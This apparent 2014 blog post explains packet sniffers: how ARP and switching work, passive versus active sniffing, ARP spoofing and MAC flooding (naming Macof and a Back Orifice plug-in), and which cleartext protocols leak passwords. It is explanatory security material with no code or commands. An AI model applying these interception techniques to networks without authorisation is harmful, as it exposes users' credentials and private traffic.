A sniffer is a program or device that monitors data traveling over a network. Sniffers can be used for legitimate activities, such as network management, or for illegitimate activities, like stealing information found on a net- work. A variety of different types of sniffers are available, including commercial and open-source variations.
Some of the simplest types use a command-line interface to dump captured data onto the screen, while more sophisticated types use a graphical user interface (GUI), can graph traffic statistics, track multiple sessions, and offer different configuration options. Network utilization and monitoring programs often use sniffers to gather data for metrics and analysis. Generally, sniffers do not intercept or alter captured data.
The objective of sniffing is to steal the following:
- Passwords (from e-mail, the Web, SMB, FTP, SQL, or Telnet)
- E-mail text
- Files in transfer (e-mail files, FTP files, or SMB)
How Does a Sniffer Work?
The most common way of networking computers is through Ethernet. A computer connected to the LAN has two addresses. One is the Media Access Control (MAC) address that uniquely identifies each node in a local area network (LAN) and is stored on the network card itself. The MAC address is used by the Ethernet protocol while building frames to transfer data to and from a system. The other is the Internet Protocol (IP) address. This numerical address is used to transfer data through routers and across multiple networks or wide area networks (WANs) using the Internet Protocol. The data link layer uses an Ethernet header with the MAC address of the destination machine rather than the IP address. The network layer is responsible for mapping IP network addresses to MAC addresses, as required by the data link protocols. It initially looks for the MAC address of the destination machine in a table, usually called the ARP cache. Address Resolution Protocol (ARP) is an Internet protocol used to map IP addresses to MAC addresses. If no entry is found for the IP address, an ARP broadcast of a request packet goes out to all machines on the local subnetwork. The machine with that particular address responds to the source machine with its MAC address. This MAC address then gets added to the source machine’s ARP cache. The source machine, in all its communications with the destination machine, then uses this MAC address.
There are two basic types of Ethernet environments, and sniffers work slightly differently in both these environments. The following are the two types of Ethernet environments:
Shared Ethernet: In a shared Ethernet environment, all hosts are connected to the same bus and com- pete for bandwidth. In this environment, all machines receive packets meant for one machine. Thus, when machine 1 wants to talk to machine 2, it sends a packet out on the network with the destination MAC address of machine 2 along with its own source MAC address. The other machines in the shared Ethernet (machine 3 and machine 4) compare the frame’s destination MAC address with their own. If they do not match, the frame is discarded. However, a machine running a sniffer ignores this rule and accepts all frames. Sniffing in a shared Ethernet environment is totally passive and hence difficult to detect.
Switched Ethernet: An Ethernet environment in which the hosts are connected to a switch instead of a hub is called switched Ethernet. A hub is a network device that sends received packets to all computers connected to it. A switch maintains a table keeping track of each computer’s MAC address, and the physical port on which that MAC address is connected, and delivers packets destined for a particular machine. A switch is a device that sends packets to the destined computer only and does not broadcast the packets to all the computers on the network. This results in better utilization of the available bandwidth and improved security. Hence, the process of putting the machine NIC into promiscuous mode to gather packets does not work. As a result, many people think that switched networks are totally secure and immune to sniffing. However, this is not true.
Though a switch is more secure than a hub, sniffing the network is possible using the following methods:
ARP spoofing: ARP is stateless. The machine can send an ARP reply even if one has not been asked for, and such a reply will be accepted. When a machine wants to sniff the traffic originating from another system, it can ARP-spoof the gateway of the network. The ARP cache of the target machine will have the wrong entry for the gateway. In this way, all the traffic destined to pass through the gateway will now pass through the machine that spoofed the gateway MAC address.
MAC flooding: Switches keep a translation table that maps various MAC addresses to the physical ports on the switch. As a result of this, they can intelligently route packets from one host to another. But switches have limited memory for this work. MAC flooding makes use of this limitation to bombard switches with fake MAC addresses until the switches cannot keep up. Once this happens to a switch, it then enters into what is known as “failopen mode,” wherein it starts acting as a hub by broadcasting packets to all the ports on the switch. Once that happens, sniffing can be performed easily. MAC flood- ing can be performed by using Macof, a utility that comes with the Dsniff suite.
Types of Sniffing
In passive sniffing, as a sniffer gathers packets at the data link layer, it can potentially grab all the packets on the LAN of the machine running the sniffer program. This is because a network with a hub implements a broadcast medium shared by all systems on the LAN. Any data sent across the LAN is actually sent to each and every machine connected to the LAN. If an attacker runs a sniffer on one system on the LAN, he or she can gather data sent to and from any other system on the LAN. The majority of sniffer tools are ideally suited to sniff data in a hub environment. These tools are called passive sniffers because they passively wait for the data to be sent before capturing it. These sniffers are efficient at silently gathering data from the LAN.
In passive sniffing, the intruder gets access to the network by any of the following methods:
- By compromising physical security
- By using a Trojan horse
Trojan software can be used as a carrier to install sniffers on the target machine. For instance, the Back Orifice server has a plug-in known as Butt Trumpet that will e-mail the attacker after installation of the server. Once the attacker recognizes that the victim’s system has been compromised, he or she can then install a packet sniffer and use it to sniff the network.
A countermeasure against passive sniffing is to replace the network hub with a switch. Unlike a hub-based network, switched Ethernet does not broadcast all information (other than an actual broadcast or multicast packet) to all systems on the LAN. The switch regulates the flow of data between its ports by actively monitor- ing the MAC address on each port, which helps it to pass data only to its intended target.
The switch, thereby, limits the data that a passive sniffer can gather. If there is a passive sniffer activated on a switched LAN, the sniffer will only be able to see data going to and from the machine on which the sniffer is installed.
Switched networks have been developed to accomplish the necessity of more bandwidth, not for the neces- sity of secure networks. Since the evolution was not driven by security needs, there are ways to circumvent this network posture and sniff traffic.
So, how does an attacker sniff on a switched LAN? The sniffers for a switched LAN actively inject traffic into the LAN to enable sniffing of the traffic. This is what is known as active sniffing. Some of the methods used in this attack include the following:
- ARP spoofing
- MAC flooding
- MAC duplicating
Protocols Vulnerable to Sniffing
The following are some protocols that are vulnerable to sniffing.
Telnet and rlogin: With sniffing, the keystrokes of a user can be captured as they are typed, including the user’s username and password. Some tools can capture all text and dump it into a terminal emulator, which can reconstruct exactly what the end user is seeing. This can produce a real-time view on the remote user’s screen.
HTTP: The default version of HTTP has many loopholes. Basic authentication is used by many Web sites, which usually send passwords across the wire in plain text. Many Web sites use a technique that prompts the user for a username and password that are sent across the network in plain text. Data sent is in clear text.
SNMP: SNMP traffic that is SNMPv1 has little security. SNMP passwords are sent in clear text across the network.
NNTP: Passwords and data are sent in clear text across the network.
POP: Passwords and data are sent in clear text across the network.
FTP: Passwords and data are sent in clear text across the network.
IMAP: Passwords and data are sent in clear text across the network.
Published on Mon 03 February 2014 by Randy Nugent in Security with tag(s): network sniffer